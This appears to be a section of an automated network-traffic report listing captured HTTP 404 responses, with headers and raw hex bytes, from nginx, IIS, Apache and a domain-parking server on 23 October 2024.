    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce 34 4f 6f be 79 f1 f5 4b af 6f 9e b1 4e ed 3a 5e cf df 35 e3 50 da c3 0d ee f0 b6 2f 7b a2 25 b6 c7 9e 1d 3b be 57 ab 5f db 5b 3b 65 9d d9 da 6a 9f b1 9a 56 26 24 13 26 b0 38 74 6f 55 16 8b a9 55 ad 91 f4 9c 6d 05 33 5c 8e aa f5 0a fa ab 30 f4 c3 a7 1c d0 10 ab 18 13 85 76 ab 52 16 04 bf e4 7e 1e c7 db ec e7 67 d6 8b 40 03 d7 91 45 a2 a7 d6 6d 7e 50 59 bf b9 67 27 e9 68 69 c4 76 fd de 24 c7 76 d7 08 e0 2b a1 ff 75 c8 7d 9d 0c af dc c6 c8 9d 7e ea 74 fb 1d d7 e9 0f 62 e0 81 64 a9 b0 2c 87 3b 77 3a d9 03 12 39 d3 a2 a5 67 a8 ef 39 3b 4b 87 1a 9e 1f 93 4a b1 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 7e fa 11 3e de 4b 0e d3 8f d3 1b f8 7c 88 df a3 e4 6e b2 4f 8f ef ae 78 dd 28 58 6b 22 1e 75 e4 76 0d 42 6d 8e d5 41 1c 07 d1 05 cb 42 f8 99 08 60 1d 0c 9e bf ed bb ae bf 2b 3c df 0f 14 50 82 0f 88 03 a0 45 85 c0 b3 0c fb 14 d6 9d 2e e2 7e 08 65 fe 4a b3 9b e9 47 e9 cd a6 25 db 4d 0b eb 68 37 e7 16 d3 57 9d 4e 16 eb c6 6e 28 83 00 42 33 03 cf b7 77 38 16 3b 88 05 10 c3 d2 4e ec 96 01 62 1a 34 62 44 b1 8c 1d 1b 0e 98 9b 75 c6 d6 46 36 3f f9 69 75 6a 8d 39 8f 18 4c 0d 95 a5 cc 31 58 6d 37 83 e5 a3 7b 4a e3 18 c1 fa ec de 6a 76 c3 76 72 a8 1d 96 fc 40 9e 4c 7e 60 ef 3e 38 e6 cf 19 a3 07 cb 16 de 1d c7 b1 ef 45 b9 c5 b1 f2 12 0c f4 43 68 a9 3f c0 0d ae 1f 76 d8 cf ca b3 09 6c d9 83 c8 b9 aa 3a 40 c0 48 ba ec 8e cc aa c5 f8 c2 82 59 7f 76 0d 78 b9 24 22 90 bd 1e 1c d5 71 09 3b f3 d8 23 92 d6 f8 b3 76 07 be 13 59 eb f6 40 d9 c3 d6 4a 8f 93 c5 62 0e 5f 91 a3 60 0d a3 3a 91 3f 0e 6d d5 ca 95 20 76 ae b4 7f 4d 72 08 8d a2 bc 62 0a 9e f2 0a 98 be 4b 31 79 f2 8a 7a fe 48 3a 05 c9 e7 81 53 52 5e 77 b0 3c b5 6b ad 8f e3 51 ae d9 12 fd a9 07 65 9a f1 28 d7 7d 85 9a 6c ac 4b 3a 7d af 15 c1 58 5e af 03 69 27 2f 35 f9 3b c0 f1 9f e4 40 a4 9f 26 47 e9 67 e9 4d 91 dc cf d9 e1 74 29 20 a3 40 7a 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce 34 4f 6f be 79 f1 f5 4b af 6f 9e b1 4e ed 3a 5e cf df 35 e3 50 da c3 0d ee f0 b6 2f 7b a2 25 b6 c7 9e 1d 3b be 57 ab 5f db 5b 3b 65 9d d9 da 6a 9f b1 9a 56 26 24 13 26 b0 38 74 6f 55 16 8b a9 55 ad 91 f4 9c 6d 05 33 5c 8e aa f5 0a fa ab 30 f4 c3 a7 1c d0 10 ab 18 13 85 76 ab 52 16 04 bf e4 7e 1e c7 db ec e7 67 d6 8b 40 03 d7 91 45 a2 a7 d6 6d 7e 50 59 bf b9 67 27 e9 68 69 c4 76 fd de 24 c7 76 d7 08 e0 2b a1 ff 75 c8 7d 9d 0c af dc c6 c8 9d 7e ea 74 fb 1d d7 e9 0f 62 e0 81 64 a9 b0 2c 87 3b 77 3a d9 03 12 39 d3 a2 a5 67 a8 ef 39 3b 4b 87 1a 9e 1f 93 4a b1 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 7e fa 11 3e de 4b 0e d3 8f d3 1b f8 7c 88 df a3 e4 6e b2 4f 8f ef ae 78 dd 28 58 6b 22 1e 75 e4 76 0d 42 6d 8e d5 41 1c 07 d1 05 cb 42 f8 99 08 60 1d 0c 9e bf ed bb ae bf 2b 3c df 0f 14 50 82 0f 88 03 a0 45 85 c0 b3 0c fb 14 d6 9d 2e e2 7e 08 65 fe 4a b3 9b e9 47 e9 cd a6 25 db 4d 0b eb 68 37 e7 16 d3 57 9d 4e 16 eb c6 6e 28 83 00 42 33 03 cf b7 77 38 16 3b 88 05 10 c3 d2 4e ec 96 01 62 1a 34 62 44 b1 8c 1d 1b 0e 98 9b 75 c6 d6 46 36 3f f9 69 75 6a 8d 39 8f 18 4c 0d 95 a5 cc 31 58 6d 37 83 e5 a3 7b 4a e3 18 c1 fa ec de 6a 76 c3 76 72 a8 1d 96 fc 40 9e 4c 7e 60 ef 3e 38 e6 cf 19 a3 07 cb 16 de 1d c7 b1 ef 45 b9 c5 b1 f2 12 0c f4 43 68 a9 3f c0 0d ae 1f 76 d8 cf ca b3 09 6c d9 83 c8 b9 aa 3a 40 c0 48 ba ec 8e cc aa c5 f8 c2 82 59 7f 76 0d 78 b9 24 22 90 bd 1e 1c d5 71 09 3b f3 d8 23 92 d6 f8 b3 76 07 be 13 59 eb f6 40 d9 c3 d6 4a 8f 93 c5 62 0e 5f 91 a3 60 0d a3 3a 91 3f 0e 6d d5 ca 95 20 76 ae b4 7f 4d 72 08 8d a2 bc 62 0a 9e f2 0a 98 be 4b 31 79 f2 8a 7a fe 48 3a 05 c9 e7 81 53 52 5e 77 b0 3c b5 6b ad 8f e3 51 ae d9 12 fd a9 07 65 9a f1 28 d7 7d 85 9a 6c ac 4b 3a 7d af 15 c1 58 5e af 03 69 27 2f 35 f9 3b c0 f1 9f e4 40 a4 9f 26 47 e9 67 e9 4d 91 dc cf d9 e1 74 29 20 a3 40 7a 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:57:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 35 30 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 69 63 68 6e 79 79 72 6f 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Wed, 23 Oct 2024 16:57:24 GMTConnection: closeContent-Length: 5096Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:10 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 